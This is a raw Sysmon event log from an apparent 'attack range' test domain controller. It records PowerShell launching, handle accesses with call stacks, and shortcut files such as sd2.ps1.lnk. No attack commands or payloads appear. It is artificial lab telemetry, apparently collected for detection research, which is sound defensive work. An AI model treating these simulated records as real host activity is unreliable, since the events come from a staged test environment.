\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf78a904.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.557{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.510{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.510{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.473{466BC892-32D3-60E8-770B-00000000CF01}63569004C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.458{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.442{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.426{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001055152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.395{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001055151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.393{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001055149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=F162F5A3A8EA069EFE08946426F0949D,SHA256=3548E24A809395CF1715D89F4CC3F6DE8CCF1F0DE7425435E6710264AC524053,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.341{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.326{466BC892-F89E-60EB-087E-00000000CF01}80729788C:\Windows\system32\conhost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.292{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F89E-60EB-087E-00000000CF01}8072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.277{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001055138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.247{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 